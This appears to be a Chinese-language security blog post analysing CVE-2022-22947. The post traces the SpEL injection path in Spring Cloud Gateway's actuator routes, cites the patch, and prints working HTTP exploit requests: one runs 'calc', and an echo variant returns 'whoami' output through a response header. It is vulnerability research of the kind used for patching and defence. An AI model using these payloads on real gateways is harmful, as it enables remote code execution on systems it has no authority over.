spring-cloud-gateway_spel_CVE-2022-22947
|
510
|
0
|
java,vuln

398 字
|
5 分钟

1.ssrf https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/

2.spel https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/

影响版本:

  • 3.1.0
  • 3.0.0 to 3.0.6
  • Older, unsupported versions are also affected

补丁在https://github.com/spring-cloud/spring-cloud-gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e

image-20220304104647017

可以看到在org/springframework/cloud/gateway/support/ShortcutConfigurable.java 替换了StandardEvaluationContext表达式

ShortcutConfigurable.getValue

这里对entryValue参数做了表达式解析

image-20220304104929467

向上回溯一下发现在ShortcutConfigurable的枚举类的DEFAULT中有调用

ShortcutConfigurable.ShortcutType

image-20220304105040692

ConfigurationService$ConfigurableBuilder.normalizeProperties

image-20220304110739606

ConfigurationService$AbstractBuilder.bind

image-20220304110756317

到这里,先看一下ShortcutConfigurable类,可以看到有很多FilterFactory的实现类

image-20220304111011467

文档https://cloud.spring.io/spring-cloud-gateway/multi/multi__actuator_api.html说明这些FilterFactory是路由过滤器

image-20220304111153529

RouteDefinitionRouteLocator.loadGatewayFilters中会根据参数filterDefinitions的名字去找对于的FilterFactory

然后去调用bind方法完成后面的调用

image-20220304112633585

再往上会发现filterDefinitions是从routeDefinitions中取出的,也就是路由的一些定义

image-20220304113030713

最终可以回溯到/refresh路由

所以,首先新增路由,其中filters的args放spel表达式,然后刷新路由,会根据创建路由的信息找到对应的FilterFactory并执行bind方法,最后表达式解析

POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Content-Type: application/json

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "#{T(java.lang.Runtime).getRuntime().exec(\"calc\")}",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "https://wya.pl",
  "order": 0
}
POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:9000
Content-Type: application/json
Connection: close

回显: 用了AddResponseHeaderFilterFactory,会把args输出到response中:

POST /actuator/gateway/routes/test HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 300
Content-Type: application/json
Connection: close

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "ddd"
            }
        }
    ],
    "uri": "http://test.com",
    "order": 0
}

https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md
https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/

Post Views: 547
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
						

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇